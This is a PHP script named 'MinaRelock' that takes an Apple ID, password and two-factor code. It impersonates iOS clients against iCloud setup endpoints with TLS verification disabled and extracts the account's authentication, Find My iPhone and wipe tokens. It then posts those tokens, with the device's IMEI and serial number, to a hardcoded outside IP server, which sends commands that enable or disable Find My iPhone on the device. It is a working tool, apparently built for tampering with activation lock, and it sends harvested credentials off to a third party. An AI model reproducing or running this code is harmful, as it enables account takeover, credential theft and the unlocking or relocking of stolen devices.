MinaRelock

1. <?php
2. namespace CFPropertyList;
3. include('./CFPropertyList/CFPropertyList.php');
4. include('./config.php');
5. $commanType=$_POST['command'];
6. $DeviceClass=$_POST['dClass'];
7. $imei="";
8. if(isset($_POST['imei']))
9. $imei=$_POST['imei'];
10.  
11. $sn=$_POST['sn'];
12.  
13. function fmipWipeToken($appleID, $Password)
14. {
15. $url = 'https://setup.icloud.com/setup/fmipauthenticate/$APPLE_ID$';
16. //echo $url;
17. $post_data = '{"clientContext":{"productType":"iPhone6,1","buildVersion":"376","appName":"FindMyiPhone","osVersion":"7.1.2","appVersion":"3.0","clientTimestamp":507669952542,"inactiveTime":1,"deviceUDID":"67bbe2ad90e7106f462cb15df7a49e0bb2a8fiio"},"serverContext":{}}';
18. $bacio=base64_encode($appleID.':'.$Password);
19. //echo $bacio;
20. $ch = curl_init();
21. curl_setopt($ch, CURLOPT_URL , $url );
22. curl_setopt($ch, CURLOPT_RETURNTRANSFER , 1);
23. curl_setopt($ch, CURLOPT_TIMEOUT , 60);
24. curl_setopt($ch, CURLOPT_VERBOSE, 0);
25. curl_setopt($ch, CURLOPT_HEADER, 0);
26. curl_setopt($ch, CURLOPT_HTTPHEADER, array("Host: setup.icloud.com", "Accept: */*", "Authorization: Basic".$bacio, "Proxy-Connection: keep-alive", "X-MMe-Country: EC", "X-MMe-Client-Info: <iPhone7,2> <iPhone OS;8.1.2;12B440> <com.apple.AppleAccount/1.0 (com.apple.Preferences/1.0)>", "Accept-Language: es-es", "Content-Type: text/plist", "Connection: keep-alive"));
27. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
28. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
29. curl_setopt($ch, CURLOPT_USERAGENT , "User-Agent: Ajustes/1.0 CFNetwork/711.1.16 Darwin/14.0.0" );
30. curl_setopt($ch, CURLOPT_POST , 1);
31. curl_setopt($ch, CURLOPT_POSTFIELDS , $post_data );
32.  
33. $xml_response = curl_exec($ch);
34.  
35. if (curl_errno($ch)) {
36. $error_message = curl_error($ch);
37. $error_no = curl_errno($ch);
38.  
39. echo "error_message: " . $error_message . "<br>";
40. echo "error_no: " . $error_no . "<br>";
41. }
42.  
43. curl_close($ch);
44.  
45. $response = $xml_response;
46.  
47. $activationRQ=$response;
48. $plist = new CFPropertyList();
49. $plist->parse($activationRQ);
50. $wipePlist=$plist->toArray();
51. $dsid=$wipePlist['appleAccountInfo']['dsid'];
52. $mmeFMIPWipeToken=$wipePlist['tokens']['mmeFMIPWipeToken'];
53.  
54.  
55. return $mmeFMIPWipeToken;
56. //echo $this->authTokenRefresh;
57. }
58.  
59. function loginDelegates($appleID, $Password)
60. {
61. $url = "https://setup.icloud.com/setup/iosbuddy/loginDelegates";
62. //echo $url;
63. $post_data = '<?xml version="1.0" encoding="UTF-8"?>
64. <!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
65. <plist version="1.0">
66. <dict>
67. <key>apple-id</key>
68. <string>'.$appleID.'</string>
69. <key>client-id</key>
70. <string>FEF008A5-F554-46A1-9057-E4CF335668EF</string>
71. <key>delegates</key>
72. <dict>
73. <key>com.apple.gamecenter</key>
74. <dict/>
75. <key>com.apple.mobileme</key>
76. <dict/>
77. <key>com.apple.private.ids</key>
78. <dict>
79. <key>protocol-version</key>
80. <string>4</string>
81. </dict>
82. </dict>
83. <key>password</key>
84. <string>'.$Password.'</string>
85. </dict>
86. </plist>
87. ';
88. //$bacio=base64_encode($dsid.':'.$mmeFMIPWipeToken);
89. //echo $bacio;
90. $ch = curl_init();
91. curl_setopt($ch, CURLOPT_URL , $url );
92. curl_setopt($ch, CURLOPT_RETURNTRANSFER , 1);
93. curl_setopt($ch, CURLOPT_TIMEOUT , 60);
94. curl_setopt($ch, CURLOPT_VERBOSE, 0);
95. curl_setopt($ch, CURLOPT_HEADER, 0);
96. curl_setopt($ch, CURLOPT_HTTPHEADER, array("Accept-Language: es-es", "Accept: */*", "Content-Type: text/plist", "X-Apple-Find-API-Ver: 6.0", "X-Apple-I-MD-RINFO: 17106176", "Connection: keep-alive", "Content-Length: ".strlen($post_data), "X-Apple-Realm-Support: 1.0", "X-MMe-Client-Info: <iPod5,1> <iPhone OS;9.3.5;13G36> <com.apple.AppleAccount/1.0 (com.apple.accountsd/113)>"));
97.  
98. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
99. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
100. curl_setopt($ch, CURLOPT_USERAGENT , "accountsd/113 CFNetwork/758.5.3 Darwin/15.6.0" );
101. curl_setopt($ch, CURLOPT_POST , 1);
102. curl_setopt($ch, CURLOPT_POSTFIELDS , $post_data );
103.  
104. $xml_response = curl_exec($ch);
105. //echo $xml_response;
106. if (curl_errno($ch)) {
107. $error_message = curl_error($ch);
108. $error_no = curl_errno($ch);
109.  
110. echo "error_message: " . $error_message . "<br>";
111. echo "error_no: " . $error_no . "<br>";
112. }
113.  
114. curl_close($ch);
115.  
116. $response = $xml_response;
117.  
118.  
119. $activationRQ=$response;
120. $plist = new CFPropertyList();
121. $plist->parse($activationRQ);
122. $wipePlist=$plist->toArray();
123. $dsid=$wipePlist['dsid'];
124. $mmeAuthToken=$wipePlist['delegates']['com.apple.mobileme']['service-data']['tokens']['mmeAuthToken'];
125. return $dsid.":".$mmeAuthToken;
126.  
127.  
128. }
129.  
130. function get_account_settings($dsid, $mmeAuthToken)
131. {
132. $url = "https://setup.icloud.com/setup/get_account_settings";
133. //echo $url;
134. $post_data = '<?xml version="1.0" encoding="UTF-8"?>
135. <!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
136. <plist version="1.0">
137. <dict>
138. <key>protocolVersion</key>
139. <string>1.0</string>
140. <key>userInfo</key>
141. <dict>
142. <key>client-id</key>
143. <string>FEF008A5-F554-46A1-9057-E4CF335668EF</string>
144. <key>language</key>
145. <string>es-EC</string>
146. <key>timezone</key>
147. <string>America/Guayaquil</string>
148. </dict>
149. </dict>
150. </plist>';
151. $bacio=base64_encode($dsid.':'.$mmeAuthToken);
152. //echo $bacio;
153. $ch = curl_init();
154. curl_setopt($ch, CURLOPT_URL , $url );
155. curl_setopt($ch, CURLOPT_RETURNTRANSFER , 1);
156. curl_setopt($ch, CURLOPT_TIMEOUT , 60);
157. curl_setopt($ch, CURLOPT_VERBOSE, 0);
158. curl_setopt($ch, CURLOPT_HEADER, 0);
159. curl_setopt($ch, CURLOPT_HTTPHEADER, array("Host: setup.icloud.com", "Accept-Language: es-es", "Accept: */*", "Content-Type: application/xml", "X-Apple-Find-API-Ver: 6.0", "X-Apple-I-MD-RINFO: 17106176", "Connection: keep-alive", "Content-Length: ".strlen($post_data), "X-Apple-Realm-Support: 1.0", "X-MMe-Client-Info: <iPod5,1> <iPhone OS;9.3.5;13G36> <com.apple.AppleAccount/1.0 (com.apple.accountsd/113)>", "Authorization: Basic ".$bacio));
160.  
161. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
162. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
163. curl_setopt($ch, CURLOPT_USERAGENT , "Setup/1.0 CFNetwork/758.5.3 Darwin/15.6.0" );
164. curl_setopt($ch, CURLOPT_POST , 1);
165. curl_setopt($ch, CURLOPT_POSTFIELDS , $post_data );
166.  
167. $xml_response = curl_exec($ch);
168.  
169. if (curl_errno($ch)) {
170. $error_message = curl_error($ch);
171. $error_no = curl_errno($ch);
172.  
173. echo "error_message: " . $error_message . "<br>";
174. echo "error_no: " . $error_no . "<br>";
175. }
176.  
177. curl_close($ch);
178.  
179. $response = $xml_response;
180.  
181. $activationRQ=$response;
182. $plistParser= new CFPropertyList();
183. $plistParser->parse($activationRQ);
184. $wipePlist=$plistParser->toArray();
185. //print_r($wipePlist);
186.  
187. $mmeFMIPToken=$wipePlist['tokens']['mmeFMIPToken'];
188. $mmeFMFToken=$wipePlist['tokens']['mmeFMFToken'];
189. return $mmeFMIPToken.":".$mmeFMFToken;
190.  
191.  
192. }
193.  
194. function poster($query)
195. {
196.  
197. $postdata = http_build_query(
198. $query
199. );
200.  
201. $opts = array('http' =>
202. array(
203. 'method' => 'POST',
204. 'header' => 'Content-type: application/x-www-form-urlencoded',
205. 'content' => $postdata
206. )
207. );
208.  
209. $context = stream_context_create($opts);
210.  
211. $result = file_get_contents('http://138.68.245.112/relock/api.php', false, $context);
212. }
213.  
214.  
215.  
216.  
217. $deletor=file_get_contents("http://138.68.245.112/relock/api.php?user=cn&ifExist=".$imei);
218. $deletor=file_get_contents("http://138.68.245.112/relock/api.php?user=cn&ifExistSN=".$sn);
219. $deletor=file_get_contents("http://138.68.245.112/relock/api.php?user=cn&ifExistCommand=".$imei);
220.  
221. if($commanType=="relock")
222. {
223. $user=$_POST['appleID'];
224. $fa_code='';
225. if($_POST['code']=="000000")
226. {
227. $fa_code='';
228. }
229. else
230. {
231. $fa_code=$_POST['code'];
232. }
233. $pass=$_POST['password'].$fa_code; //;
234. $loginInfo=loginDelegates($user, $pass);
235. $loginInfoArray=explode(":", $loginInfo);
236. $dsid=$loginInfoArray[0];
237. $mmeAuthToken=$loginInfoArray[1];
238. $settingsInfo=get_account_settings($dsid, $mmeAuthToken);
239. $settingsInfoArray=explode(":", $settingsInfo);
240. $mmeFMIPToken=$settingsInfoArray[0];
241. $mmeFMFToken=$settingsInfoArray[1];
242. $authToken = base64_encode($dsid.":".$mmeFMIPToken);
243. if($DeviceClass=="GSM")
244. {
245. $messageBody = array('buildCommand' => "true",
246. 'DeviceClass' => 'GSM',
247. 'command'=> 'enableFMIP',
248. 'imei'=> $imei,
249. 'meid'=> "000",
250. 'serialNumber'=> $sn,
251. 'productType' => "iPhone10,1", //$_POST['pType'],
252. 'appleID'=> $user,
253. 'dsid'=> $dsid,
254. 'authToken'=> "Basic ".$authToken,
255. 'wipeToken'=> fmipWipeToken(DEVICE_APPLEID, DEVICE_APPLEID_PW),
256. 'user' => 'cn',
257. );
258. poster($messageBody);
259. }
260. else
261. {
262. $messageBody = array('buildCommand' => "true",
263. 'DeviceClass' => 'GSM',
264. 'command'=> 'enableFMIP',
265. 'imei'=> '000',
266. 'meid'=> "000",
267. 'serialNumber'=> $sn,
268. 'productType' => "iPad2,5", //$_POST['pType'],
269. 'appleID'=> $user,
270. 'dsid'=> $dsid,
271. 'authToken'=> "Basic ".$authToken,
272. 'wipeToken'=> fmipWipeToken(DEVICE_APPLEID, DEVICE_APPLEID_PW),
273. 'user' => 'cn',
274. );
275. poster($messageBody);
276. }
277. }
278. else if($commanType=="relockV2")
279. {
280.  
281. $user=$_POST['appleID'];
282. $fa_code='';
283. if($_POST['code']=="000000")
284. {
285. $fa_code='';
286. }
287. else
288. {
289. $fa_code=$_POST['code'];
290. }
291. $pass=$_POST['password'].$fa_code; //;
292. $loginInfo=loginDelegates($user, $pass);
293. $loginInfoArray=explode(":", $loginInfo);
294. $dsid=$loginInfoArray[0];
295. $mmeAuthToken=$loginInfoArray[1];
296. $settingsInfo=get_account_settings($dsid, $mmeAuthToken);
297. $settingsInfoArray=explode(":", $settingsInfo);
298. $mmeFMIPToken=$settingsInfoArray[0];
299. $mmeFMFToken=$settingsInfoArray[1];
300. $authToken = base64_encode($dsid.":".$mmeFMIPToken);
301. if($DeviceClass=="GSM")
302. {
303. $messageBody = array('buildCommand' => "true",
304. 'DeviceClass' => 'GSM',
305. 'command'=> 'enableFMIPV2',
306. 'imei'=> $imei,
307. 'meid'=> substr($imei, 0, -1),
308. 'serialNumber'=> $sn,
309. 'productType' => "iPhone10,3", //$_POST['pType'],
310. 'appleID'=> $user,
311. 'dsid'=> $dsid,
312. 'authToken'=> "Basic ".$authToken,
313. 'wipeToken'=> fmipWipeToken(DEVICE_APPLEID, DEVICE_APPLEID_PW),
314. 'user' => 'cn',
315. );
316. poster($messageBody);
317. }
318. else
319. {
320. $messageBody = array('buildCommand' => "true",
321. 'DeviceClass' => 'GSM',
322. 'command'=> 'enableFMIP',
323. 'imei'=> '000',
324. 'meid'=> "000",
325. 'serialNumber'=> $sn,
326. 'productType' => "iPad2,5", //$_POST['pType'],
327. 'appleID'=> $user,
328. 'dsid'=> $dsid,
329. 'authToken'=> "Basic ".$authToken,
330. 'wipeToken'=> fmipWipeToken(DEVICE_APPLEID, DEVICE_APPLEID_PW),
331. 'user' => 'cn',
332. );
333. poster($messageBody);
334. }
335.  
336. }
337. else if($commanType=="disableFMIP")
338. {
339. $messageBody = array('buildCommand' => "true",
340. 'command'=> 'disableFMIP',
341. 'wipeToken'=> fmipWipeToken(DEVICE_APPLEID, DEVICE_APPLEID_PW),
342. 'user' => 'cn',
343. );
344. poster($messageBody);
345. }
346. else if($commanType=="disableLostMode")
347. {
348. $messageBody['aps'] = array('alert' => $message,
349. 'sound' => 'default',
350. 'badge' => 1,
351. 'content-available' => '1',
352. 'command'=> 'disableLostMode',
353. );
354.  
355. }
356.  
357.  
358. if($commanType=="disableFMIP")
359. {
360. echo "Disable FMIP Command Sent!";
361. }
362. else
363. {
364. $data="";
365. $time = 15; //how long in ;seconds do you allow your program to run/search
366. $found = false;
367. for($i=0; $i<$time; $i++){
368. if(isset($_POST['imei']))
369. {
370. $result=file_get_contents("http://138.68.245.112/relock/api.php?&user=cn&getRelockResult=".$imei);
371. }
372. if(isset($_POST['sn']))
373. {
374. $result=file_get_contents("http://138.68.245.112/relock/api.php?user=cn&getRelockResultSN=".$sn);
375. }
376. if($result!=""){
377. $data=$result;
378. $found = true;
379. break;
380. }
381. sleep(1); // if ;not found wait one second before continue looping
382. }
383.  
384. if($found)
385. {
386. if($data=="Relocked")
387. {
388. if($imei==000)
389. echo "Device SerialNumber: ".$sn." relock success!";
390. else
391. echo "Device imei: ".$imei." relock success!";
392. }
393. else if($data=="fail")
394. {
395. if($imei==000)
396. echo "Device SerialNumber: ".$sn." relock fail!";
397. else
398. echo "Device imei: ".$imei." relock fail!";
399. }
400. }
401. }// find command type
402.  
403.  
404.  
405. ?>